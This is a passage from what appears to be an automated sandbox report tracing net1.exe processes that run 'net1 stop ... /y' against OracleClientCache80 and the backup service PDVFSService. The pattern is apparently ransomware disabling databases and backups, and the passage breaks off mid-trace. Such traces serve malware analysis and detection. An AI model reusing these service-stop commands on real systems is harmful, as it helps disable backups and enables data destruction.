Region: id = 9040 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9041 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9042 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9043 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9044 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9047 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 701 os_tid = 0xdc0 [0107.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefed0 | out: lpSystemTimeAsFileTime=0xefed0*(dwLowDateTime=0xf54def50, dwHighDateTime=0x1d48689)) [0107.623] GetCurrentProcessId () returned 0xcf0 [0107.623] GetCurrentThreadId () returned 0xdc0 [0107.623] GetTickCount () returned 0x24a38 [0107.623] QueryPerformanceCounter (in: lpPerformanceCount=0xefed8 | out: lpPerformanceCount=0xefed8*=1815454200000) returned 1 [0107.625] GetModuleHandleW (lpModuleName=0x0) returned 0xff890000 [0107.625] __set_app_type (_Type=0x1) [0107.625] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8a9c9c) returned 0x0 [0107.625] __getmainargs (in: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788, _DoWildCard=0, _StartInfo=0xff8b479c | out: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788) returned 0 [0107.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.625] GetConsoleOutputCP () returned 0x1b5 [0107.627] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8bcec0 | out: lpCPInfo=0xff8bcec0) returned 1 [0107.628] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.631] sprintf_s (in: _DstBuf=0xefe78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.632] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.648] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.648] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" [0107.648] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.648] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.649] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe68 | out: Buffer=0xefe68*=0x184d60) returned 0x0 [0107.649] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe68 | out: Buffer=0xefe68*=0x18c130) returned 0x0 [0107.649] _fileno (_File=0x7fefdba2a80) returned 0 [0107.649] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.649] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.649] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.649] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.649] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.649] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.649] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.649] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.649] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.649] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.649] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.649] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.649] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.649] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.649] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.649] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.649] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.649] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.650] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.650] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.650] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.650] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.650] _wcsicmp (_String1="accounts", _String2="OracleClientCache80") returned -14 [0107.650] _wcsicmp (_String1="computer", _String2="OracleClientCache80") returned -12 [0107.650] _wcsicmp (_String1="config", _String2="OracleClientCache80") returned -12 [0107.650] _wcsicmp (_String1="continue", _String2="OracleClientCache80") returned -12 [0107.650] _wcsicmp (_String1="cont", _String2="OracleClientCache80") returned -12 [0107.650] _wcsicmp (_String1="file", _String2="OracleClientCache80") returned -9 [0107.650] _wcsicmp (_String1="files", _String2="OracleClientCache80") returned -9 [0107.650] _wcsicmp (_String1="group", _String2="OracleClientCache80") returned -8 [0107.650] _wcsicmp (_String1="groups", _String2="OracleClientCache80") returned -8 [0107.650] _wcsicmp (_String1="help", _String2="OracleClientCache80") returned -7 [0107.650] _wcsicmp (_String1="helpmsg", _String2="OracleClientCache80") returned -7 [0107.650] _wcsicmp (_String1="localgroup", _String2="OracleClientCache80") returned -3 [0107.650] _wcsicmp (_String1="pause", _String2="OracleClientCache80") returned 1 [0107.650] _wcsicmp (_String1="session", _String2="OracleClientCache80") returned 4 [0107.650] _wcsicmp (_String1="sessions", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="sess", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="share", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="start", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="stats", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="statistics", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="stop", _String2="OracleClientCache80") returned 4 [0107.651] _wcsicmp (_String1="time", _String2="OracleClientCache80") returned 5 [0107.651] _wcsicmp (_String1="user", _String2="OracleClientCache80") returned 6 [0107.651] _wcsicmp (_String1="users", _String2="OracleClientCache80") returned 6 [0107.651] _wcsicmp (_String1="msg", _String2="OracleClientCache80") returned -2 [0107.651] _wcsicmp (_String1="messenger", _String2="OracleClientCache80") returned -2 [0107.651] _wcsicmp (_String1="receiver", _String2="OracleClientCache80") returned 3 [0107.651] _wcsicmp (_String1="rcv", _String2="OracleClientCache80") returned 3 [0107.651] _wcsicmp (_String1="netpopup", _String2="OracleClientCache80") returned -1 [0107.651] _wcsicmp (_String1="redirector", _String2="OracleClientCache80") returned 3 [0107.651] _wcsicmp (_String1="redir", _String2="OracleClientCache80") returned 3 [0107.651] _wcsicmp (_String1="rdr", _String2="OracleClientCache80") returned 3 [0107.651] _wcsicmp (_String1="workstation", _String2="OracleClientCache80") returned 8 [0107.651] _wcsicmp (_String1="work", _String2="OracleClientCache80") returned 8 [0107.652] _wcsicmp (_String1="wksta", _String2="OracleClientCache80") returned 8 [0107.652] _wcsicmp (_String1="prdr", _String2="OracleClientCache80") returned 1 [0107.652] _wcsicmp (_String1="devrdr", _String2="OracleClientCache80") returned -11 [0107.652] _wcsicmp (_String1="lanmanworkstation", _String2="OracleClientCache80") returned -3 [0107.652] _wcsicmp (_String1="server", _String2="OracleClientCache80") returned 4 [0107.652] _wcsicmp (_String1="svr", _String2="OracleClientCache80") returned 4 [0107.652] _wcsicmp (_String1="srv", _String2="OracleClientCache80") returned 4 [0107.652] _wcsicmp (_String1="lanmanserver", _String2="OracleClientCache80") returned -3 [0107.652] _wcsicmp (_String1="alerter", _String2="OracleClientCache80") returned -14 [0107.652] _wcsicmp (_String1="netlogon", _String2="OracleClientCache80") returned -1 [0107.652] _wcsupr (in: _String="OracleClientCache80" | out: _String="ORACLECLIENTCACHE80") returned="ORACLECLIENTCACHE80" [0107.653] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x18ce40 [0107.672] GetServiceKeyNameW (in: hSCManager=0x18ce40, lpDisplayName="ORACLECLIENTCACHE80", lpServiceName=0xff8b5750, lpcchBuffer=0xefd88 | out: lpServiceName="", lpcchBuffer=0xefd88) returned 0 [0107.673] _wcsicmp (_String1="msg", _String2="ORACLECLIENTCACHE80") returned -2 [0107.673] _wcsicmp (_String1="messenger", _String2="ORACLECLIENTCACHE80") returned -2 [0107.673] _wcsicmp (_String1="receiver", _String2="ORACLECLIENTCACHE80") returned 3 [0107.673] _wcsicmp (_String1="rcv", _String2="ORACLECLIENTCACHE80") returned 3 [0107.673] _wcsicmp (_String1="redirector", _String2="ORACLECLIENTCACHE80") returned 3 [0107.673] _wcsicmp (_String1="redir", _String2="ORACLECLIENTCACHE80") returned 3 [0107.673] _wcsicmp (_String1="rdr", _String2="ORACLECLIENTCACHE80") returned 3 [0107.673] _wcsicmp (_String1="workstation", _String2="ORACLECLIENTCACHE80") returned 8 [0107.673] _wcsicmp (_String1="work", _String2="ORACLECLIENTCACHE80") returned 8 [0107.673] _wcsicmp (_String1="wksta", _String2="ORACLECLIENTCACHE80") returned 8 [0107.673] _wcsicmp (_String1="prdr", _String2="ORACLECLIENTCACHE80") returned 1 [0107.673] _wcsicmp (_String1="devrdr", _String2="ORACLECLIENTCACHE80") returned -11 [0107.673] _wcsicmp (_String1="lanmanworkstation", _String2="ORACLECLIENTCACHE80") returned -3 [0107.673] _wcsicmp (_String1="server", _String2="ORACLECLIENTCACHE80") returned 4 [0107.673] _wcsicmp (_String1="svr", _String2="ORACLECLIENTCACHE80") returned 4 [0107.673] _wcsicmp (_String1="srv", _String2="ORACLECLIENTCACHE80") returned 4 [0107.673] _wcsicmp (_String1="lanmanserver", _String2="ORACLECLIENTCACHE80") returned -3 [0107.673] _wcsicmp (_String1="alerter", _String2="ORACLECLIENTCACHE80") returned -14 [0107.673] _wcsicmp (_String1="netlogon", _String2="ORACLECLIENTCACHE80") returned -1 [0107.673] NetServiceControl (in: servername=0x0, service="ORACLECLIENTCACHE80", opcode=0x0, arg=0x0, bufptr=0xefd90 | out: bufptr=0xefd90) returned 0x889 [0107.674] wcscpy_s (in: _Destination=0xff8b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.674] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0107.675] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.676] GetFileType (hFile=0xb) returned 0x2 [0107.676] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc58 | out: lpMode=0xefc58) returned 1 [0107.676] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefc50, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0xefc50*=0x1e) returned 1 [0107.676] GetFileType (hFile=0xb) returned 0x2 [0107.677] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc58 | out: lpMode=0xefc58) returned 1 [0107.677] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefc50, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0xefc50*=0x2) returned 1 [0107.677] _ultow (in: _Dest=0x889, _Radix=982208 | out: _Dest=0x889) returned="2185" [0107.677] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.677] GetFileType (hFile=0xb) returned 0x2 [0107.677] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc58 | out: lpMode=0xefc58) returned 1 [0107.678] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefc50, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0xefc50*=0x34) returned 1 [0107.678] GetFileType (hFile=0xb) returned 0x2 [0107.678] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc58 | out: lpMode=0xefc58) returned 1 [0107.678] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefc50, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0xefc50*=0x2) returned 1 [0107.678] NetApiBufferFree (Buffer=0x184d60) returned 0x0 [0107.678] NetApiBufferFree (Buffer=0x18c130) returned 0x0 [0107.679] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" [0107.679] exit (_Code=2) Process: id = "235" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5f06b000" os_pid = "0xe80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "228" os_parent_pid = "0xe14" cmd_line = "C:\\Windows\\system32\\net1 stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9051 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9052 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9053 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9054 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9055 start_va = 0xff180000 end_va = 0xff1b2fff entry_point = 0xff180000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9056 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9057 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9058 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9059 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9060 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9061 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9062 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9063 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9064 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9065 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9066 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 9067 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 9068 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9069 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9070 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9071 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9072 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9073 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9074 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9075 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9076 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9077 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9078 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9079 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9080 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9081 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9082 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9083 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9084 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9085 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9101 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 702 os_tid = 0xe90 [0107.787] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcb0 | out: lpSystemTimeAsFileTime=0x28fcb0*(dwLowDateTime=0xf565bd10, dwHighDateTime=0x1d48689)) [0107.787] GetCurrentProcessId () returned 0xe80 [0107.787] GetCurrentThreadId () returned 0xe90 [0107.787] GetTickCount () returned 0x24ad4 [0107.787] QueryPerformanceCounter (in: lpPerformanceCount=0x28fcb8 | out: lpPerformanceCount=0x28fcb8*=1815470600000) returned 1 [0107.789] GetModuleHandleW (lpModuleName=0x0) returned 0xff180000 [0107.789] __set_app_type (_Type=0x1) [0107.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff199c9c) returned 0x0 [0107.789] __getmainargs (in: _Argc=0xff1a4780, _Argv=0xff1a4790, _Env=0xff1a4788, _DoWildCard=0, _StartInfo=0xff1a479c | out: _Argc=0xff1a4780, _Argv=0xff1a4790, _Env=0xff1a4788) returned 0 [0107.789] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.789] GetConsoleOutputCP () returned 0x1b5 [0107.789] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1acec0 | out: lpCPInfo=0xff1acec0) returned 1 [0107.789] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.791] sprintf_s (in: _DstBuf=0x28fc58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.791] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.792] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.792] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.792] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0107.792] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f9f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.792] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.792] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fc48 | out: Buffer=0x28fc48*=0xf4d50) returned 0x0 [0107.792] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fc48 | out: Buffer=0x28fc48*=0xfc100) returned 0x0 [0107.792] _fileno (_File=0x7fefdba2a80) returned 0 [0107.792] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.793] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.793] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.793] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.793] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.793] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.793] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.793] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.793] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.793] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.793] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.793] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.793] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.793] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.793] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.793] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.793] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.793] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.793] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.793] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.793] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.793] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.793] _wcsicmp (_String1="accounts", _String2="PDVFSService") returned -15 [0107.793] _wcsicmp (_String1="computer", _String2="PDVFSService") returned -13 [0107.793] _wcsicmp (_String1="config", _String2="PDVFSService") returned -13 [0107.793] _wcsicmp (_String1="continue", _String2="PDVFSService") returned -13 [0107.793] _wcsicmp (_String1="cont", _String2="PDVFSService") returned -13 [0107.793] _wcsicmp (_String1="file", _String2="PDVFSService") returned -10 [0107.793] _wcsicmp (_String1="files", _String2="PDVFSService") returned -10 [0107.793] _wcsicmp (_String1="group", _String2="PDVFSService") returned -9 [0107.793] _wcsicmp (_String1="groups", _String2="PDVFSService") returned -9 [0107.793] _wcsicmp (_String1="help", _String2="PDVFSService") returned -8 [0107.793] _wcsicmp (_String1="helpmsg", _String2="PDVFSService") returned -8 [0107.793] _wcsicmp (_String1="localgroup", _String2="PDVFSService") returned -4 [0107.793] _wcsicmp (_String1="pause", _String2="PDVFSService") returned -3 [0107.793] _wcsicmp (_String1="session", _String2="PDVFSService") returned 3 [0107.793] _wcsicmp (_String1="sessions", _String2="PDVFSService") returned 3 [0107.793] _wcsicmp (_String1="sess", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="share", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="start", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="stats", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="statistics", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="stop", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="time", _String2="PDVFSService") returned 4 [0107.794] _wcsicmp (_String1="user", _String2="PDVFSService") returned 5 [0107.794] _wcsicmp (_String1="users", _String2="PDVFSService") returned 5 [0107.794] _wcsicmp (_String1="msg", _String2="PDVFSService") returned -3 [0107.794] _wcsicmp (_String1="messenger", _String2="PDVFSService") returned -3 [0107.794] _wcsicmp (_String1="receiver", _String2="PDVFSService") returned 2 [0107.794] _wcsicmp (_String1="rcv", _String2="PDVFSService") returned 2 [0107.794] _wcsicmp (_String1="netpopup", _String2="PDVFSService") returned -2 [0107.794] _wcsicmp (_String1="redirector", _String2="PDVFSService") returned 2 [0107.794] _wcsicmp (_String1="redir", _String2="PDVFSService") returned 2 [0107.794] _wcsicmp (_String1="rdr", _String2="PDVFSService") returned 2 [0107.794] _wcsicmp (_String1="workstation", _String2="PDVFSService") returned 7 [0107.794] _wcsicmp (_String1="work", _String2="PDVFSService") returned 7 [0107.794] _wcsicmp (_String1="wksta", _String2="PDVFSService") returned 7 [0107.794] _wcsicmp (_String1="prdr", _String2="PDVFSService") returned 14 [0107.794] _wcsicmp (_String1="devrdr", _String2="PDVFSService") returned -12 [0107.794] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSService") returned -4 [0107.794] _wcsicmp (_String1="server", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="svr", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp (_String1="srv", _String2="PDVFSService") returned 3 [0107.794] _wcsicmp 